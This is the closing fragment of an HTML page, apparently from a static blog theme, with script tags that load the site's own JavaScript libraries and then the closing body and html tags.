  <script type="text/javascript" src="/lib/velocity/velocity.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/velocity/velocity.ui.min.js?v=1.2.1"></script>

  
  <script type="text/javascript" src="/lib/fancybox/source/jquery.fancybox.pack.js?v=2.1.5"></script>


  


  <script type="text/javascript" src="/js/src/utils.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/motion.js?v=5.1.2"></script>



  
  


  <script type="text/javascript" src="/js/src/affix.js?v=5.1.2"></script>

  <script type="text/javascript" src="/js/src/schemes/pisces.js?v=5.1.2"></script>



  
  <script type="text/javascript" src="/js/src/scrollspy.js?v=5.1.2"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=5.1.2"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=5.1.2"></script>



  


  




	





  





  






  





  

  

  

  

  

  

</body>
</html>
